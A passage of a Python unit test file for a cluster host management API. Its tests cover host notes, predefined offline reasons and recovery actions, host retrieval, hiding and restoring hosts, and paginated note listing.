'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request)
self.assertEqual('200 OK', api_response.status)
host_note = protojson.decode_message(api_messages.Note,
api_response.body)
host_note_event = api_messages.NoteEvent(
note=host_note, lab_name=lab_name)
# Assert datastore id is generated.
self.assertIsNotNone(host_note.id)
# Assert fields equal.
self.assertEqual(api_request['hostname'], host_note.hostname)
self.assertEqual(api_request['user'], host_note.user)
self.assertEqual(api_request['message'], host_note.message)
self.assertEqual(offline_reason, host_note.offline_reason)
self.assertEqual(recovery_action, host_note.recovery_action)
self.assertEqual(api_request['event_time'],
host_note.event_time.isoformat())
# Assert PredefinedMessage used_count fields are updated.
self.assertEqual(3, offline_reason_key.get().used_count)
self.assertEqual(6, recovery_action_key.get().used_count)
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note.id), histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_once_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)

@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_InvalidIdOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests adding a host note with invalid predefined message ids."""
offline_reason = 'offline-reason'
recovery_action = 'recovery-action'
lab_name = 'lab-name'
predefined_message_entities = [
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 111),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_OFFLINE_REASON,
content=offline_reason,
used_count=2),
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 222),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_RECOVERY_ACTION,
content=recovery_action,
used_count=5),
]
ndb.put_multi(predefined_message_entities)
# Wrong-type recovery action: id 111 is an offline reason.
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'recovery_action_id': 111,
'lab_name': lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
# Non-existing offline reason.
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': 333,
'lab_name': lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)

@mock.patch.object(note_manager, 'PublishMessage')
def testBatchUpdateNotesWithPredefinedMessage(
self, mock_publish_host_note_message):
"""Tests updating notes with the same content and PredefinedMessage."""
api_request = {
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline_reason-1',
'recovery_action': 'recovery_action-1',
'lab_name': 'lab-1',
'event_time': self.TIMESTAMP.isoformat(),
'notes': [
{
'hostname': self.ndb_host_0.hostname,
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request)
self.assertEqual('200 OK', api_response.status)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(3, len(note_msgs))
self.assertEqual(self.ndb_host_0.hostname, note_msgs[0].hostname)
self.assertEqual(self.ndb_host_1.hostname, note_msgs[1].hostname)
self.assertEqual(self.ndb_host_2.hostname, note_msgs[2].hostname)
self.assertEqual('message-1', note_msgs[0].message)
self.assertEqual('message-1', note_msgs[1].message)
self.assertEqual('message-1', note_msgs[2].message)
self.assertEqual('user-1', note_msgs[0].user)
self.assertEqual('user-1', note_msgs[1].user)
self.assertEqual('user-1', note_msgs[2].user)
self.assertEqual('offline_reason-1', note_msgs[0].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[1].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[2].offline_reason)
self.assertEqual('recovery_action-1', note_msgs[0].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[1].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[2].recovery_action)
self.assertEqual(self.TIMESTAMP, note_msgs[0].event_time)
self.assertEqual(self.TIMESTAMP, note_msgs[1].event_time)
self.assertEqual(self.TIMESTAMP, note_msgs[2].event_time)
# Side Effect: Assert each PredefinedMessage is created only once.
offline_reasons = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_OFFLINE_REASON)
.fetch())
self.assertEqual(1, len(offline_reasons))
self.assertEqual(3, offline_reasons[0].used_count)
self.assertEqual('offline_reason-1', offline_reasons[0].content)
recovery_actions = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_RECOVERY_ACTION)
.fetch())
self.assertEqual(1, len(recovery_actions))
self.assertEqual(3, recovery_actions[0].used_count)
self.assertEqual('recovery_action-1', recovery_actions[0].content)
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[0].id),
histories[0].extra_info['host_note_id'])
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_1.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[1].id),
histories[0].extra_info['host_note_id'])
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_2.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[2].id),
histories[0].extra_info['host_note_id'])
# Side Effect: Assert host note event is published.
mock_publish_host_note_message.assert_has_calls([
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[0],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[1],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[2],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
])

@mock.patch.object(note_manager, 'PublishMessage')
def testBatchUpdateNotes_ExistingNoteAndPredefinedMessage(
self, mock_publish_host_note_message):
"""Tests batch-updating notes that reuse existing Note and PredefinedMessage entities."""
existing_entities = [
datastore_entities.Note(
hostname=self.ndb_host_0.hostname,
type=common.NoteType.HOST_NOTE),
datastore_entities.PredefinedMessage(
type=common.PredefinedMessageType.HOST_OFFLINE_REASON,
content='offline_reason-1',
lab_name='lab-1',
used_count=2),
datastore_entities.PredefinedMessage(
type=common.PredefinedMessageType.HOST_RECOVERY_ACTION,
content='recovery_action-1',
lab_name='lab-1',
used_count=3),
]
keys = ndb.put_multi(existing_entities)
api_request = {
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': str(keys[1].id()),
'recovery_action_id': str(keys[2].id()),
'lab_name': 'lab-1',
'notes': [
{
'id': str(keys[0].id()),
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request)
self.assertEqual('200 OK', api_response.status)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(3, len(note_msgs))
self.assertEqual(self.ndb_host_0.hostname, note_msgs[0].hostname)
self.assertEqual(self.ndb_host_1.hostname, note_msgs[1].hostname)
self.assertEqual(self.ndb_host_2.hostname, note_msgs[2].hostname)
self.assertEqual('message-1', note_msgs[0].message)
self.assertEqual('message-1', note_msgs[1].message)
self.assertEqual('message-1', note_msgs[2].message)
self.assertEqual('user-1', note_msgs[0].user)
self.assertEqual('user-1', note_msgs[1].user)
self.assertEqual('user-1', note_msgs[2].user)
self.assertEqual('offline_reason-1', note_msgs[0].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[1].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[2].offline_reason)
self.assertEqual('recovery_action-1', note_msgs[0].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[1].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[2].recovery_action)
# Side Effect: Assert each PredefinedMessage is created only once.
offline_reasons = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_OFFLINE_REASON)
.fetch())
self.assertEqual(1, len(offline_reasons))
self.assertEqual(5, offline_reasons[0].used_count)
self.assertEqual('offline_reason-1', offline_reasons[0].content)
recovery_actions = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_RECOVERY_ACTION)
.fetch())
self.assertEqual(1, len(recovery_actions))
self.assertEqual(6, recovery_actions[0].used_count)
self.assertEqual('recovery_action-1', recovery_actions[0].content)
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(0, len(histories))
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_1.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[1].id),
histories[0].extra_info['host_note_id'])
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_2.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[2].id),
histories[0].extra_info['host_note_id'])
# Side Effect: Assert host note event is published.
mock_publish_host_note_message.assert_has_calls([
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[0],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[1],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[2],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
])

def testBatchUpdateNotes_InvalidPredefinedMessages(self):
"""Tests batch-updating notes with invalid predefined message ids."""
offline_reason = 'offline-reason'
recovery_action = 'recovery-action'
lab_name = 'lab-name'
existing_entities = [
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 111),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_OFFLINE_REASON,
content=offline_reason,
used_count=2),
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 222),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_RECOVERY_ACTION,
content=recovery_action,
used_count=5),
]
ndb.put_multi(existing_entities)
# Non-existing recovery action.
api_request = {
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': '111',
'recovery_action_id': '444',
'notes': [
{
'hostname': self.ndb_host_0.hostname,
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
# Non-existing offline reason.
api_request = {
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': '333',
'recovery_action_id': '222',
'notes': [
{
'hostname': self.ndb_host_0.hostname,
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)

def testGetHost(self):
"""Tests GetHost."""
api_request = {'hostname': self.ndb_host_0.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(1, len(host.device_infos))
self.assertEqual(self.ndb_device_1.device_serial,
host.device_infos[0].device_serial)
self.assertEqual(0, len(host.notes))

def testGetHost_noDevices(self):
"""Tests GetHost when a host has no devices."""
api_request = {'hostname': self.ndb_host_2.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual(0, len(host.device_infos))

def testGetHost_includeHidden(self):
"""Tests GetHost including hidden devices."""
api_request = {'hostname': self.ndb_host_0.hostname, 'include_hidden': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(2, len(host.device_infos))
self.assertItemsEqual(['device_0', 'device_1'],
[d.device_serial for d in host.device_infos])
self.assertEqual(0, len(host.notes))

def testGetHost_includeNotes(self):
"""Tests GetHost including notes when they are available."""
api_request = {'hostname': self.ndb_host_0.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(1, len(host.notes))
self.assertEqual(self.note.user, host.notes[0].user)
self.assertEqual(self.note.timestamp, host.notes[0].timestamp)
self.assertEqual(self.note.message, host.notes[0].message)

def testGetHost_includeNotesNoneAvailable(self):
"""Tests GetHost including notes when none are available."""
api_request = {'hostname': self.ndb_host_1.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_1, host)
self.assertEqual(0, len(host.notes))

def testGetHost_includeHistoryState(self):
"""Tests GetHost including state history."""
timestamp1 = datetime.datetime(2015, 10, 9, 1)
timestamp2 = datetime.datetime(2015, 10, 9, 2)
state1 = api_messages.HostState.RUNNING
state2 = api_messages.HostState.GONE
history_key1 = ndb.Key(
datastore_entities.HostStateHistory,
self.ndb_host_1.hostname + str(timestamp1),
parent=self.ndb_host_1.key)
ndb_host_1_state_history1 = datastore_entities.HostStateHistory(
key=history_key1,
hostname=self.ndb_host_1.hostname,
timestamp=timestamp1,
state=state1)
ndb_host_1_state_history1.put()
history_key2 = ndb.Key(
datastore_entities.HostStateHistory,
self.ndb_host_1.hostname + str(timestamp2),
parent=self.ndb_host_1.key)
ndb_host_1_state_history2 = datastore_entities.HostStateHistory(
key=history_key2,
hostname=self.ndb_host_1.hostname,
timestamp=timestamp2,
state=state2)
ndb_host_1_state_history2.put()
api_request = {
'hostname': self.ndb_host_1.hostname,
'include_host_state_history': True
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_1, host)
self.assertEqual(2, len(host.state_history))
self.assertEqual(host.state_history[0].state, state2.name)
self.assertEqual(host.state_history[0].timestamp, timestamp2)
self.assertEqual(host.state_history[1].state, state1.name)
self.assertEqual(host.state_history[1].timestamp, timestamp1)

def testGetHost_includeUpdateState(self):
"""Tests GetHost including update state."""
display_message = 'Some host update display message for syncing.'
datastore_test_util.CreateHostUpdateState(
self.ndb_host_0.hostname, state=api_messages.HostUpdateState.SYNCING,
display_message=display_message)
api_request = {
'hostname': self.ndb_host_0.hostname,
'include_host_state_history': True
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(self.ndb_host_0.hostname, host.hostname)
self.assertEqual('SYNCING', host.update_state)
self.assertEqual(display_message, host.update_state_display_message)

def testNewNote_withNoneExisting(self):
"""Tests adding a note to a host when none exist already."""
user = 'some_user'
timestamp = datetime.datetime(2015, 10, 18, 20, 46)
message = 'The Message'
offline_reason = 'Wires are disconnected'
recovery_action = 'Press a button'
api_request = {
'hostname': self.ndb_host_1.hostname,
'user': user,
'timestamp': timestamp.isoformat(),
'message': message,
'offline_reason': offline_reason,
'recovery_action': recovery_action,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.NewNote',
api_request)
self.assertEqual('200 OK', api_response.status)
api_request = {'hostname': self.ndb_host_1.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual(1, len(host.notes))
self.assertEqual(user, host.notes[0].user)
self.assertEqual(timestamp, host.notes[0].timestamp)
self.assertEqual(message, host.notes[0].message)
self.assertEqual(offline_reason, host.notes[0].offline_reason)
self.assertEqual(recovery_action, host.notes[0].recovery_action)

def testNewNote_withExisting(self):
"""Tests adding a note to a host when one already exists."""
user = 'some_user'
timestamp = datetime.datetime(2015, 10, 18, 20, 46)
message = 'The Message'
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': user,
'timestamp': timestamp.isoformat(),
'message': message
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.NewNote',
api_request)
self.assertEqual('200 OK', api_response.status)
# Query the same host again. Notes should be sorted.
api_request = {'hostname': self.ndb_host_0.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual(2, len(host.notes))
self.assertEqual(user, host.notes[0].user)
self.assertEqual(timestamp, host.notes[0].timestamp)
self.assertEqual(message, host.notes[0].message)
self.assertEqual(self.note.user, host.notes[1].user)
self.assertEqual(self.note.timestamp, host.notes[1].timestamp)
self.assertEqual(self.note.message, host.notes[1].message)

def testRemove(self):
"""Tests Remove."""
# Check that the existing host is not set to hidden
api_request = {'hostname': self.ndb_host_0.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertFalse(host.hidden)
# Call Remove
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Remove',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
# Verify API response
self.assertEqual('200 OK', api_response.status)
self.assertTrue(host.hidden)
# Verify by retrieving the host
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertTrue(host.hidden)
for device in host.device_infos:
# Hiding a host also hides all of its devices.
self.assertTrue(device.hidden)

def testRemove_missingHost(self):
"""Tests Remove with an invalid hostname."""
api_request = {'hostname': 'some-fake-hostname'}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.Remove', api_request, expect_errors=True)
self.assertEqual('404 Not Found', api_response.status)

def testRestore(self):
"""Tests Restore."""
# Check that the existing host is set to hidden
api_request = {'hostname': self.ndb_host_1.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertTrue(host.hidden)
# Call Restore
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Restore',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
# Verify API response
self.assertEqual('200 OK', api_response.status)
self.assertFalse(host.hidden)
# Verify by retrieving the host
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertFalse(host.hidden)
for device in host.device_infos:
# Restoring a host does not restore the devices under it.
self.assertTrue(device.hidden)

def testRestore_missingHost(self):
"""Tests Restore with an invalid hostname."""
api_request = {'hostname': 'some-fake-hostname'}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.Restore', api_request, expect_errors=True)
self.assertEqual('404 Not Found', api_response.status)

def testListHostNotes(self):
"""Tests ListNotes returns host notes sorted by timestamp."""
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
ndb.put_multi(note_entities)
# The results are sorted by timestamp in descending order.
api_request = {
'hostname': 'host_1',
'count': 2,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertTrue(host_note_collection_msg.more)
self.assertIsNotNone(host_note_collection_msg.next_cursor)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[0].user, note_entities[2].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[2].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[2].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[1].user, note_entities[0].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[0].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[0].recovery_action)

def testListHostNotes_includeDeviceNotes(self):
"""Tests ListNotes including device notes."""
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
type=common.NoteType.DEVICE_NOTE,
hostname='host_1',
device_serial='device_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
ndb.put_multi(note_entities)
# The results are sorted by timestamp in descending order.
api_request = {
'hostname': 'host_1',
'count': 2,
'include_device_notes': True,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertTrue(host_note_collection_msg.more)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[3].hostname)
self.assertEqual(note_msgs[0].user, note_entities[3].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[3].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[3].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[3].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[3].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[1].user, note_entities[2].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[2].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[2].recovery_action)
# query the second page to make sure the cursor works
api_request = {
'hostname': 'host_1',
'count': 3,
'include_device_notes': True,
'cursor': host_note_collection_msg.next_cursor,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertFalse(host_note_collection_msg.more)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[0].user, note_entities[0].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[0].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[0].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[1].hostname)
self.assertEqual(note_msgs[1].user, note_entities[1].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[1].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[1].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[1].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[1].recovery_action)
def testListHostNotes_withCursorAndOffsetAndBackwards(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
ndb.put_multi(note_entities)
# The result will be sorted by timestamp in descending order.
api_request = {
'hostname': 'host_1',
'count': 2,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertTrue(host_note_collection_msg.more)
self.assertIsNotNone(host_note_collection_msg.next_cursor)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[3].hostname)
self.assertEqual(note_msgs[0].user, note_entities[3].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[3].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[3].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[3].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[3].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[1].user, note_entities[2].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[2].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[2].recovery_action)
# fetch next page
api_request = {
'hostname': 'host_1',
'count': 2,
'cursor': host_note_collection_msg.next_cursor,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertIsNotNone(host_note_collection_msg.prev_cursor) # has previous
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[0].user, note_entities[0].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[0].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[0].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[1].hostname)
